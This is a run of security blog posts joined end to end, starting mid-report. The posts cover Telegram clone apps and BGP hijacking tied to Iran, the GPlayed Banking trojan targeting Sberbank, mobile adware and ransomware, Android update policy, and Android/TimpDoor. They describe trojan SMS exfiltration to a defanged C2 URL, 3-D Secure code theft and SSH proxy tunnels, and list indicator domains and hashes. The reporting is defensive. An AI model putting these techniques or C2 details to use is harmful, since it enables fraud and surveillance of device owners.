IOS: 3361ba9ec3480bcd3766e07cf6b4068a 
Accept: */* 
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0 
Accept-Language: en-gb 
Accept-Encoding: gzip, deflate 
Content-Length: 0

If the version is not up to date, the application redirects the user to the andromedaa store:

Instructions to trust the developer certificate

The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.

Ozvbegir(ozvdarozv) application

The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.

Application description (translation by Google Translate)

We analyzed the Android version of the application. The application package is signed by a self-signed certificate that's valid until the year 3014.

Most recent Ozvbegir certificate

Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information was clearly false.

Older version's certificate

Just like the previous application, the Ozvbegir application is repackaged and includes original classes from the Telegram application.

Ozvbegir classes structure

In fact, we found signs in the manifest that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used on the manifest have several references to the Telegram original application and even the API key used for the Android Maps app was kept the same.


Update check and reply

Just like the previous application, this one also checks for new versions by performing an HTTP request to the ndrm.ir domain. If the application is not the latest version, it receives both a message and link to obtain the most recent version, which can be anything the operator wants. In this case, it's from cafebazaar.ir, an Iranian Android application store.

The domain ndrm.ir is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran and coincidently is the one with the ability to upgrade the application on mobile devices.

The application has a look and feel that strongly resembles the original Telegram application. Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.


Phone number request

This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.


Sessions created on a single phone

The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1 
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1 
NUM: df27340104277f1e73142224d9cb59e8 
HEADER: bt6 
ADMIN: web 
Host: v1.ozvdarozv.com 
Connection: close 
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)


We identified more than 1 million subscribers on the Telegram channel who automatically joined when they first opened the application.


Channel information


Bitgram_dev

Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications — AseGram and BitGram — on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.

AseGram and BitGram on Google Play

Publisher information

Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.

Application examples



AseGram



The AseGram application is available on the Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.

AseGram certificate

This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: This software uses a proxy defined at the Telegram package layer in order to intercept traffic.

Set proxy code


Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.

The service org.pouyadr.Service.MyService starts upon boot. This calls the MessagesController.getGlobalMainSettings() from the original Telegram package and will change the settings to include the proxy configuration.

The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.

The application contacts three domains: talagram.ir, hotgram.ir and harsobh.com, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications. 

This application creates a service that can't be disabled just by closing the application and starts when the device boots up. The service contains the necessary code to install new packages, but the action is handled by the standard package manager in the system. This service is also responsible for contacting IP addresses located in Iran. In fact, this uses the back end of the Telegram clone called "Advanced Telegram," or (Golden Telegram). This application is available at cafebazaa.ir, an Iranian state-sanctioned Android application store.


Advanced Telegram cafebazaar page (translation by Google translate)

It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find an legitimate use case where an application that circumvents a ban should contact the same servers used by a cloned application that is vetted by the same country that applied the ban, making these communications highly suspicious.

The application also contains code to use socks servers located in several countries, which can be used to circumvent the ban. However, during our research we have never seen these being used. On the other side, if the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.

Fake websites

Spoofed Telegram Websites

The most straightforward approach to gain access to an end user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.

Fake Telegram login page

This domain was registered on July 25, 2017. Based on the tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address — nami.rosoki@gmail[.]com — used to register this domain, as well as other domains and its passive Domain Name Servers (pDNS) records suggest that this domain is associated with the Charming Kitten group. This same domain was independently associated with Charming Kitten by another cybersecurity firm, Clearsky. Upon further inspection of the web page source code, it appears as though the website was built using the GitHub project called "Webogram," there were also strings in the source page to suggest this website's display was designed for iPhones.

Source code, GitHub.com reference

Newly identified Charming Kitten domains


While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains that contained keywords such as "mobile," "messenger," and in some cases, "hangouts," Which is likely a reference to the Google chat application called Hangouts. This suggests that these actors had continuous interest in gaining access to end users' mobile devices and specifically their chat messages.
These domains were also registered using the same Modus operandi as all the other domains associated with this group in 2017. Through analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.


This clearly demonstrates that this group has an ongoing activity with a focus on user credentials and messaging applications.

BGP Routing Anomalies


Background


While monitoring BGPStream, Cisco's database of Border Gateway Protocol (BGP) announcement, Talos noticed some routing anomalies originating from an Iranian-based autonomous system number (ASN) 58224. For those unfamiliar with this protocol, BGP is defined in Request for Comments (RFC) 4271, as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows for internet communications to occur when requesting a resource located outside of the requested network or autonomous system.

BGP is used across the internet to assist with the selection of the best path routing. It's important to note this can be manipulated at ISP levels depending on various factors, which BGP allows for route selection. BGP optimizes the routing of internet traffic through the speaking system, which RFC 4271 defines as:

The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.

These speaking systems serve as a platform for routers to send out "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."

While this was designed as a feature to combat networking issues, there was no adequate security mechanism added to prevent it from being abused. BGP offers no mechanism for security other than some methods like MD5 passwords for neighbours, IPSec or GTSM. None of these are default requirements and as such are not necessarily widely used. This could allow someone to send out an update message with an alternate route to the same prefix or AS, even if there was no issue with the primary route. 

This could result in some traffic passing through a predetermined, or sub-optimal route for the victim. These routing deviations are sometimes referred to as BGP hijacking sessions. BGP hijacking sessions' effectiveness are measured based on the number of BGP peers who receive the update through messages. The more peers who receive the update message, the more likely traffic is being routed through the alternative sub-optimal path, that is pre-configured by the actor.

Pre-Planned Routing Activity from ASN 58224


One interesting BGP routing anomaly occurred on June 30, 2018 at 07:41:28 UTC. During this event, the Iranian-based ASN 58224 announced an update for the prefix 185.112.156.0/22. The Iranian telecommunications provider Iran Telecommunication Company PJS owned the ASN that sent out the update message.

This range potentially being hijacked was associated with Hungarian-based internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected this event, and it lasted for two hours and 15 minutes until a new update message was disseminated. While this event was quite small in scale, this could have been a trial run for a larger BGP hijack attempt.


There were more significant BGP anomalies that originated from that same Iran-based ASN 58224. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as being "more specific" at the exact same time, down to the second, impacting communications with Telegram. When routers received this update message through the speaking system, they began routing some traffic destined to the Telegram servers through the ASN 58224. This campaign proved to be particularly effective, since a large number of BGPmon peers observed it, suggesting that it propagated throughout the region via the speaking system. Just like the event one month prior, all routers received a corrected update message two hours and 15 minutes later, ending the hijack.

How BGP Hijacking could have enabled computer network operations


Theoretically, this announcement could have one component of an operation to compromise communications with Telegram servers. This hijacking session led to some Telegram messages being sent to an Iranian telecommunications provider. Other nation-state actors have used this technique in order to deliver malware, as documented by other security researchers, two months prior in May 2018. Once the traffic is routed through a desired ISP, it could be subject to modification and inspection. There has been open-source reporting that suggests that Iran- based telecommunication providers have previously cooperated with Iranian government requests to obtain communications. The article suggests telecommunications companies provided government officials with Telegram SMS verification codes needed to gain access to Telegram accounts.

This particular capability would be attractive, since it could allow the actors to route traffic in neighboring ASNs through Iran. This could allow the threat actors to gain access to devices in nearby countries and compromise users who utilized non-Iranian telecommunications providers.

The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it will be investigated. Nothing further has been publicly released regarding this investigation from the Iranian government.

Conclusions


The three techniques we discussed here are not the only ones that state-sponsored actors can use to deploy surveillance mechanisms targeting their citizens. The topic of mass internet firewalling and surveillance deployment has been in the news before. Some of these campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. But we found that there are several Telegram clones with several thousands installations that somehow contact IP addresses located in Iran, some of them that advertise the fact that they can circumvent the ban. The activity of these applications is not illegal, but it gives its operators total control over the messaging applications, and to some extent, users' devices.

The long-lasting activity of groups like Charming Kitten, even while using classic phishing techniques, are still effective against users who aren't very aware of cybersecurity. Given that the common denominator of all of these activities was the citizenship, it is understandable that the vast majority of any country's population won't be as cybersecurity educated as a cybersecurity professional, so even this classic technique could be highly effective.

While it is impossible for Talos to precisely determine the intent behind the July 30 routing update messages, Talos assess with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely for four update messages to be distributed at the exact same time, to route two different Telegram ranges through four different subnets all associated with one ASN: 58224. This assessment statement also considers open-source reporting on Iran's complicated history with Telegram from passing laws banning the use of Telegram, to reports of outages resulting from Telegram's IP addresses being blocked in Iran.

Aside from the victims and the applications, Talos was unable to find any solid link between each of these events. This investigation was focused on Iran due to the current ban on Telegram. However, these techniques could be used by any malicious actor, being with or without state sponsorship. Talos assesses with high confidence that the users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.

IOC

Domains

talagram[.]ir
hotgram[.]ir
Harsobh[.]com
ndrm[.]ir
andromedaa[.]ir
buycomment[.]ir
bazdiddarbazdid[.]com
youpo[.]st
im9[.]ir
followerbegir[.]ir
buylike[.]ir
buyfollower[.]ir
andromedaa[.]ir
30dn[.]ir
ndrm[.]ir
followerbeg[.]ir
viewmember[.]ir
ozvdarozv[.]ir
ozvbegir[.]ir
obgr[.]ir
likebeg[.]ir
lbgr[.]ir
followgir[.]ir
followbegir[.]ir
fbgr[.]ir
commentbegir[.]ir
cbgr[.]ir
likebegir[.]com
commentbegir[.]com
andromedaa[.]com
ozvbegir[.]com
ozvdarozv[.]com
andromedaa[.]net
lik3[.]org
homayoon[.]info
buylike[.]in
lkbgr[.]com
flbgr[.]com
andromedaa[.]com
mobilecontinue[.]network
mobilecontinue[.]network
mobile-messengerplus[.]network
confirm-identification[.]name
invitation-to-messenger[.]space
com-messengersaccount[.]name
broadcastnews[.]pro
youridentityactivity[.]world
confirm-verification-process[.]systems
sessions-identifier-memberemailid[.]network
mail-profile[.]com
download-drive-share[.]ga
hangouts-talk[.]ga
mail-login-profile[.]com
watch-youtube[.]live
stratup-monitor[.]com
Xn--oogle-v1a[.]ga (ġoogle[.]ga)
file-share[.]ga

Hash values

8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram
24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram
a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d followerbegir.ipa
a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 ozvdarozv.apk

GPlayed’s younger brother is a banker — and it’s after Russian banks

This blog post is authored by Vitor Ventura.

Introduction


Cisco Talos published its findings on a new Android trojan known as "GPlayed" on Oct. 11. At the time, we wrote that the trojan seemed to be in the testing stages of development, based on the malware's code patterns, strings and telemetry visibility. Since then, we discovered that there's already a predecessor to GPlayed, which we are calling "GPlayed Banking." Unlike the first version of GPlayed, this is not an all-encompassing banking trojan. It is specifically a banking trojan that's looking to target Sberbank AutoPay users, a service offered by the Russian state-owned bank.

GPlayed Banking is spread in a similar way to the original GPlayed. It's disguised as a fake Google app store, but actually installs the malware once it's launched. This further illustrates the point that Android users need to be educated on how to spot a malicious app, and that they should be careful as to what privileges they assign to certain programs.
The malicious application is on the left-hand side.

Trojan architecture and capabilities


This malware is written in .NET using the GPlayed environment for mobile applications. The malware code is implemented in a DLL called "PlayMarket.dll."
GPlayed Banking issues its package certificate under a fake name that's not related to the application's name, nor the package's name.
Certificate information

The Android package is named "lola.catgirl." The application uses the label "Play Google Market," with an icon designed to look like the legitimate Google app store, and its name is "android.app.Application."

Package permissions

The trojan declares numerous permissions in the manifest, from which we wish to highlight the BIND_DEVICE_ADMIN, which provides nearly full control of the device to the trojan.
The working capabilities of this trojan are limited to the ones needed to perform its objective as a banking trojan. The only exception is that it also contains the ability to exfiltrate all of the user's received SMS messages to the command and control (C2).

Trojan details


Once executed, the trojan will start to obtain administrator privileges on the device by requesting that the user change its settings.
Privilege escalation requests

If the user cancels the device's administration request, the request dialog will appear again after five seconds repeatedly until the user finally gives it administrator privileges. The malware contains code that could lock the device's screen, but it's never called. The same happens with another feature that needs the device's administrator privilege.
Unused code

Notably, in order to perform its activities as a banking trojan, none of these privileges are needed.

In the next step in its initialization process, the trojan will create a timer with a random value that will range between 900 and 1,800 seconds. When triggered, this timer will start a WebView that is loaded from the URL hxxp://sub1[.]tdsworker[.]ru:6565/index_main.html. This WebView will inject an amount of 500, which given the victim's profile, it is safe to assume that there will be rubbles.

The overlay will completely cover the screen which, depending on the device, can make the mobile device unusable until reboot or the WebView is closed. The WebView code couldn't be determined because the C2 was never online during the investigation.
WebView blocking device

This WebView overlay technique is the same used by the GPlayed trojan, from the same family. However, GPlayed trojan loaded the WebView from local resources contained in the application package. In that case, the webview would request the user's credit card information to pay for supposed "Google Services." Given the similarities, it is safe to assume that this WebView would have same sort of objective. This change from having the WebView code hosted in the C2 or having it as a resource on the package shows that the authors want to remain independent from the C2.

After the malware creates the WebView, it sends an SMS to the Sberbank AutoPay (+79262000900) service with the word "баланс," which means "balance" in Russian. Upon receiving an answer, the trojan will parse it to determine the account balance. If it is lower than 3,000, the trojan won't do anything. If it is larger than 68,000 the trojan requests a value of 66,000, otherwise it will request the available amount minus 1,000.
Balance checking and amount decision

Finally, with the available amount determined, the trojan will create a new WebView object and request the amount defined according to the rules previously shown.

Password extraction code

In order to complete financial transactions, a validation code is necessary. So, the following action is the registration of an SMS handler that will parse any arriving SMS messages and look for the word "пароль," which means "password" in Russian. The malware parses the SMS containing that word to extract the password, which will then be injected into the previously created WebView. We believe this malware is specifically designed to evade the 3-D Secure anti-fraud mechanism because it injects a variable called "s3dscode" with the extracted value to the WebView object. The password is actually the validation code needed to validate the transaction.
The SMS receiver handler, beside parsing the 3-D secure validation code, will also send all SMSs to the C2.
SMS exfiltration code

The SMSs are exfiltrated using a simple GET request to the REST-based URL hxxp://sub1[.]tdsworker[.]ru:5555/sms/", the format for this request is as follows:

<URL><device id>/<sender address>/<message content>

Trojan activity


This trojan hasn't been observed in the wild yet, and it's not being detected by many antivirus programs at the time of this writing. However, the samples were submitted for detection analysis in nearly the same week as when Talos discovered the malware. Just like in the GPlayed trojan case, the ratio detection verification method was the same. First, the package was submitted followed by the DLL that holds the code. In the case of the DLL, GPlayed and this sample share one of the submission sources, further strengthening the link between the two. Given the architecture, organization and maturity of the code, the most likely relation is that this banking trojan was created based on an early version of the GPlayed trojan code base, by the same author(s) given that they also share a C2.
Code comparison (above banking trojan, below, the original GPlayed trojan)

Just like GPlayed, the C2 was never online during our research, but it would be easy to adapt this trojan to a new C2. Therefore, we don't know what was displayed in the WebView step mentioned previously. The icon file used by both malware families is the same, which can be considered another link between the packages.

Conclusion


This trojan was designed with a very specific group of victims in mind, namely Sberbank customers who use the AutoPay service. However, adapting it to fit other banks would be a trivial activity for the developers of the GPlayed malware family.

This malware family is just another example of why mobile users need to be critical about the permissions they accept to certain apps. There's no specific exploit that GPlayed family uses to infect its victims — it can be installed on a device just through a simple spam campaign. Android users need to be aware of two important points: By installing applications from untrusted application stores, they are putting themselves and their data in jeopardy. Also, giving the wrong permissions can make a difference between a malware and a legitimate app. Users cannot trust permissions justifications, as they are provided by the developer, they must be critic about the permissions and assign them on a case by case.

The interception of SMS validation codes technique is not new for banking trojans. But this banking trojan followed by the GPlayed trojan shows a clear evolution of the actors behind this malware families. They went from a simple banking trojan to a full-fledged trojan with capabilities never seen before.

The DLLs used in the malware, which hold the majority of the code, have a low detection ratio and show that anti-virus solutions are not looking at the code in a file and are more so focused on Android packages' permissions and resources. While we have not yet seen these files in the wild, they certainly have the potential to infect a large number of users and could quickly hijack a user's banking credentials.

Coverage


Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise (IOC)

URLs

hxxp://sub1[.]tdsworker[.]ru:5555/sms/
hxxp://sub1[.]tdsworker[.]ru:6565/index_main.html

Hashes

Package.apk - 81d4f6796509a998122817aaa34e1c8c6de738e1fff5146009c07be8493f162c
PlayMarket.dll - 3c82d98f63e5894f53a5d2aa06713e9212269f5f55dcb30d78139ae9da21e212

Mobile Menace Monday: top five scariest mobile threats

In the spirit of this upcoming Halloween season, we thought we’d provide you with a list of the top five scariest mobile threats in our book.

The list is organized from least to most haunting, based on my own humble opinion gathered from several years as a mobile threat researcher. Of course, my opinion has also been formed by the data we’ve collected within the last few months that shows which threats have been terrorizing customers the most. Without further ado, these are the top threats that haunt my dreams.

5) The clinking of locks and chains

Although not the most prevalent mobile malware (thank goodness), mobile ransomware’s nastiness will give you the chills. It starts by tricking users into giving away their device administrator rights.  Afterwards, the ransomware offers a treat of locking the device from any use unless you pay a ransom.

Even scarier, some mobile ransomware threatens prosecution by law enforcement, claiming illegal activities have been conducted on the device. This is all a hoax, as law enforcement would never request paying a fine through payment methods like Bitcoin or gift cards. The most popular mobile ransomware family is detected by Malwarebytes as Android/Ransom.SLocker.

4) Guerrilla warfare

As a mobile researcher, it sometimes feels like a war out there. This is especially true with the mobile malware Android/Trojan.Guerrilla. Guerrilla warfare can be described as irregular, which sums up this Guerrilla’s tactics of obfuscating malware scanners. Infections usually come with multiple variants of Guerrilla running on the device. However, for every move they make, we have a counter move. The war is never-ending.

 

3) Dashing from ghosts?  No, to the top of detections list!

Android/Adware.MobiDash will make your skin crawl! It’s one most highly-detected threats we’ve seen on customers’ Android devices! As if possessed, MobiDash goes above and beyond the typical low-level adware. It starts by sneaking its way into getting device administration rights.  Once given, the user will be doomed with ads on his lock screen.

Good luck uninstalling, as some versions are especially good at hiding themselves in plain sight!

2) Lurking in the shadows…of code!

Another high-ranking threat found on customer’s Android devices, Android/Trojan.HiddenAds, is a smooth criminal. Also known as Android/Trojan.Hiddad, its haunting ability to effectively hide its malicious code is terrifying! In fact, it often bypasses Google Play Protect‘s verification system.  Thus, apps infected with HiddenAds make it onto the Play Store. After installing on a device, periodic full-screen ads will haunt you!

1) The one that keeps me up at night: Adups

Seriously, I have lost sleep over this one. Adups and I have a long history:

Mobile Menace Monday: Adups, old and new

Mobile Menace Monday: upping the ante on Adups

Adups comes in many forms, but the most prevalent is Android/PUP.Riskware.Autoins.Fota. This variant can potentially auto install malware like Android/Trojan.Guerrilla, and Android/Trojan.HiddenAds. As addressed in the blogs linked above, it’s a preinstalled system app(s). Thus, it cannot be uninstalled through the device’s information page, only disabled.  However, the nightmare gets worse—Adups can’t even be disabled. Not even a mobile scanner can remove or disable it.

So how do we deal with this Freddy Krueger of a mobile threat? Well, you’re going to have to defeat it in a different realm: the realm of ADB command line tools, a part of Google’s Android Studio. Luckily, we found a wake to wake up from the nightmare, as we recently updated a guide on how to fully uninstall (not just disable) Adups. Beware, though, this tutorial is not for the faint of heart, and only recommended for advanced users.

Safe room

When the boogie men of mobile threats try to break through the walls, we have a safe room for you: Malwarebytes for Android keeps the scariest mobile threats at bay! Stay safe out there!

The post Mobile Menace Monday: top five scariest mobile threats appeared first on Malwarebytes Labs.

Google sets Android security updates rules but enforcement is unclear

The vendor requirements for Android are a strange and mysterious thing but a new leak claims Google has added language to force manufacturers to push more regular Android security updates.

According to The Verge, Google’s latest contract will require OEMs to supply Android security updates for two years and provide at least four updates within the first year of a device’s release. Vendors will also have to release patches within 90 days of Google identifying a vulnerability.

Mandating more consistent Android security updates is certainly a good thing, but it remains unclear what penalties Google would levy against manufacturers that fail to provide the updates or if Google would follow through on any punitive actions.

It has been known for years that Google sets certain rules for manufacturers who want to include the Play Store, Play services and Google apps on Android devices, but because enforcement has been unclear the rules have sometimes been seen as mere suggestions.

For example, Google has had a requirement in place since the spring of 2011 mandating manufacturers to upgrade devices to the latest version of the Android OS released within 18 months of a device’s launch. However, because of the logistics issues of providing those OS updates, Google has rarely been known to enforce that requirement.

This can be seen in the Android OS distribution numbers, which are a complete mess. Currently, according to Google, the most popular version of Android on devices in the wild is Android 6.0 Marshmallow (21.6%), followed by Android 7.0 (19%), Android 5.1 (14.7%), Android 8.0 (13.4%) and Android 7.1 (10.3%). And not even showing up on Google’s numbers because it hasn’t hit the 0.1% threshold for inclusion is Android 9.0 released in August.

Theoretically, the ultimate enforcement of the Android requirements would be Google barring a manufacturer from releasing a device that includes Google apps and services, but there have been no reports of that ever happening. Plus, the European Union’s recent crackdown on Android give an indication that Google does wield control over the Android ecosystem — and was found to be abusing that power.

The ruling in the EU will allow major OEMs to release forked versions of Android without Google apps and services (something they were previously barred from doing by Google’s contract). It will also force Google to bundle the Play Store, services and most Google apps into a paid licensing bundle, while offering — but not requiring — the Chrome browser and Search as a free bundle. Although early rumors suggest Google might offset the cost of the apps bundle by paying OEMs to use Chrome and Google Search, effectively making it all free and sidestepping any actual change.

These changes only apply to Android devices released in the EU, but it should lead to more devices on the market running Android but featuring third-party apps and services. This could mean some real competition for Google from less popular Android forks such as Amazon’s Fire OS or Xiaomi’s MIUI.

It’s still unknown if the new rules regarding Android security updates are for the U.S. only or if they will be part of contracts in other regions. But, an unintended consequence of the EU rules might be to strengthen Google’s claim that the most secure Android devices are those with the Play Store and Play services.

Google has long leaned on its strong record of keeping malware out of the Play Store and off of user devices, if Play services are installed. Google consistently shows that the highest rates of malware come from sideloading apps in regions where the Play Store and Play services are less common — Russia and China – and where third-party sources are more popular.

Assuming the requirements for Android security updates do apply in other regions around the globe, it might be fair to also assume they’d be tied to the Google apps and services bundle (at least in the EU) because otherwise Google would have no way to put teeth behind the rules. So, not only would Google have its stats regarding how much malware is taken care of in the Play Store and on user devices by Play services, it might also have more stats showing those devices are more consistently updated and patched.

The Play Store, services and Google apps are an enticing carrot to dangle in front of vendors when requiring things like Android security updates, and there is reason to believe manufacturers would be willing to comply in order to get those apps and services, even if the penalties are unclear.

More competition will be coming to the Android ecosystem in the EU, and it’s not unreasonable to think that competition could spread to the U.S., especially if Google is scared to face similar actions by the U.S. government (as unlikely as that may seem).  And the less power Google apps and services have in the market, the  less force there will be behind any Google requirements for security updates.

 

The post Google sets Android security updates rules but enforcement is unclear appeared first on Security Bytes.

How to Squash the Android/TimpDoor SMiShing Scam

As technology becomes more advanced, so do cybercriminals’ strategies for gaining access to our personal information. And while phishing scams have been around for over two decades, attackers have adapted their methods to “bait” victims through a variety of platforms. In fact, we’re seeing a rise in the popularity of phishing via SMS messages, or SMiShing. Just recently, the McAfee Mobile Research team discovered active SMiShing campaigns that are tricking users into downloading fake voice-messaging apps, called Android/TimpDoor.

So how does Android/TimpDoor infect a user’s device? When a victim receives the malicious text, the content will include a link. If they click on it, they’ll be directed to a fake web page. The website will then prompt the victim to download the app in order to listen to phony voice messages. Once the app has been downloaded, the malware collects the device information including device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. TimpDoor allows cybercriminals to use the infected device as a digital intermediary without the user’s knowledge. Essentially, it creates a backdoor for hackers to access users’ home networks.

According to our team’s research, these fake apps have infected at least 5,000 devices in the U.S. since the end of March. So, the next question is what can users do to defend themselves from these attacks? Check out the following tips to stay alert and protect yourself from SMS phishing:

  • Do not install apps from unknown sources. If you receive a text asking you to download something onto your phone from a given link, make sure to do your homework. Research the app developer name, product title, download statistics, and app reviews. Be on the lookout for typos and grammatical errors in the description. This is usually a sign that the app is fake.
  • Be careful what you click on. Be sure to only click on links in text messages that are from a trusted source. If you don’t recognize the sender, or the SMS content doesn’t seem familiar, stay cautious and avoid interacting with the message.
  • Enable the feature on your mobile device that blocks texts from the Internet. Many spammers send texts from an Internet service in an attempt to hide their identities. Combat this by using this feature to block texts sent from the Internet.
  • Use a mobile security software. Make sure your mobile devices are prepared for TimpDoor or any other threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, as always, to stay up-to-date on the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Squash the Android/TimpDoor SMiShing Scam appeared first on McAfee Blogs.

Android/TimpDoor Turns Mobile Devices Into Hidden Proxies

The McAfee Mobile Research team recently found an active phishing campaign using text messages (SMS) that tricks users into downloading and installing a fake voice-message app which allows cybercriminals to use infected devices as network proxies without users’ knowledge. If the fake application is installed, a background service starts a Socks proxy that redirects all network traffic from a third-party server via an encrypted connection through a secure shell tunnel—allowing potential access to internal networks and bypassing network security mechanisms such as firewalls and network monitors. McAfee Mobile Security detects this malware as Android/TimpDoor.

Devices running TimpDoor could serve as mobile backdoors for stealthy access to corporate and home networks because the malicious traffic and payload are encrypted. Worse, a network of compromised devices could also be used for more profitable purposes such as sending spam and phishing emails, performing ad click fraud, or launching distributed denial-of-service attacks.

Based on our analysis of 26 malicious APK files found on the main distribution server, the earliest TimpDoor variant has been available since March, with the latest APK from the end of August. According to our telemetry data, these apps have infected at least 5,000 devices. The malicious apps have been distributed via an active phishing campaign via SMS in the United States since at least the end of March. McAfee notified the unwitting hosts of the phishing domains and the malware distribution server; at the time of writing this post we have confirmed that they are no longer active.

Campaign targets North America

Since at least the end of March users in the United States have reported suspicious text messages informing them that they have two voice messages to review and tricking them into clicking a URL to hear them:

Figure 1. User reporting a text that required downloading a fake voice app. Source 800notes.com.

Figure 2. An August 9 text. Source: findwhocallsyou.com.

Figure 3. An August 26 text. Source: 800notes.com.

If the user clicks on one of these links in a mobile device, the browser displays a fake web page that pretends to be from a popular classified advertisement website and asks the user to install an application to listen to the voice messages:

Figure 4. A fake website asking the user to download a voice app.

In addition to the link that provides the malicious APK, the fake site includes detailed instructions on how to disable “Unknown Sources” to install the app that was downloaded outside Google Play.

Fake voice app

When the user clicks on “Download Voice App,” the file VoiceApp.apk is downloaded from a remote server. If the victim follows the instructions, the following screens appear to make the app look legitimate:

Figure 5. Fake voice app initial screens.

The preceding screens are displayed only if the Android version of the infected device is 7.1 or later (API Level 25). If the Android version is earlier, the app skips the initial screens and displays the main fake interface to listen to the “messages”:

Figure 6. The main interface of the fake voice messages app.

Everything on the main screen is fake. The Recents, Saved, and Archive icons have no functionality. The only buttons that work play the fake audio files. The duration of the voice messages does not correspond with the length of the audio files and the phone numbers are fake, present in the resources of the app.

Once the user listens to the fake messages and closes the app, the icon is hidden from the home screen to make it difficult to remove. Meanwhile, it starts a service in the background without user’s knowledge:

Figure 7. Service running in the background.

Socks proxy over SSH

As soon as the service starts, the malware gathers device information: device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. To gather the public IP address information, TimpDoor uses a free geolocation service to obtain the data (country, region, city, latitude, longitude, public IP address, and ISP) in JSON format. In case the HTTP request fails, the malware make an HTTP request to the webpage getIP.php of the main control server that provides the value “public_ip.”

Once the device information is collected, TimpDoor starts a secure shell (SSH) connection to the control server to get the assigned remote port by sending the device ID. This port will be later used for remote port forwarding with the compromised device acting as a local Socks proxy server. In addition to starting the proxy server through an SSH tunnel, TimpDoor establishes mechanisms to keep the SSH connection alive such as monitoring changes in the network connectivity and setting up an alarm to constantly check the established SSH tunnel:

Figure 8. An execution thread checking changes in connectivity and making sure the SSH tunnel is running.

To ensure the SSH tunnel is up, TimpDoor executes the method updateStatus, which sends the previously collected device information and local/public IP address data to the control server via SSH.

Mobile malware distribution server

By checking the IP address 199.192.19[.]18, which hosted VoiceApp.apk, we found more APK files in the directory US. This likely stands for United States, considering that the fake phone numbers in the voice app are in the country and the messages are sent from US phone numbers:

Figure 9. APK files in the “US” folder of the main malware distribution server.

